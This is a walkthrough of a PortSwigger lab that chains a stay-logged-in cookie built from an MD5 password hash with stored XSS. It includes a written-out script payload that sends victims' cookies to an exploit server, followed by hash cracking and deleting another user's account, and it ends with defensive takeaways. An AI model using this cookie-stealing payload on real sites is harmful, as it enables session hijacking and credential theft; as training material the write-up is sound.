[The lab](https://portswigger.net/web-security/authentication/other-mechanisms/lab-offline-password-cracking) simulates a classic _auth bypass + credential theft_ combo using two common misconfigurations:
1. **Insecure "Stay Logged In" Mechanism** – storing a predictable `username:md5(password)` string in a Base64-encoded cookie.
2. **Stored Cross-Site Scripting (XSS)** – a vulnerable comment system enables cookie exfiltration via JavaScript injection.
After logging in as `wiener:peter`, intercept the **login response** in Burp Suite (Proxy > HTTP history).
You’ll spot a `stay-logged-in` cookie like:
![[CleanShot 2025-03-24 at 23.53.59.png]]
This tells us that the server validates the cookie by **recomputing the MD5 hash of the user's password** and comparing it.
We can quickly find a XSS injection point in comment section with basic payload.
![[CleanShot 2025-03-24 at 23.56.33.png]]
Let's insert the payload:
```js
<script>document.location='https://exploit-0a1f004504c1950e836f9fb201e500dc.exploit-server.net/'+document.cookie</script>
```
![[CleanShot 2025-03-25 at 00.00.06.png]]
In the logs quickly we can see that the victim visits our site:
![[CleanShot 2025-03-25 at 00.01.46.png]]
Firstly decode BASE64. You can use decoder.
![[CleanShot 2025-03-25 at 00.05.13.png]]
Then, use [crackstation.net](https://crackstation.net/) for example.
==⚠️ **Security Tip:** Never upload real hashes to third-party sites. We do this here because it's a lab.==
![[CleanShot 2025-03-25 at 00.04.32.png]]
We those info we can delete Carlos password:
![[CleanShot 2025-03-25 at 00.07.25.png]]
### Key Takeaways for Pentesters
- **Hash-in-cookie ≠ secure** – using `md5(password)` inside persistent cookies is a broken pattern. Always use **HMACs or signed tokens**, not raw hashes.
- **Stored XSS = Goldmine** – stored XSS enables full session hijacking, especially when cookies aren’t marked `HttpOnly`.
- **Offline cracking = low noise** – no brute-force traffic hits the app, making it stealthy and effective if hash leaks.
- **Always check cookies** – custom session mechanisms often reveal application logic flaws.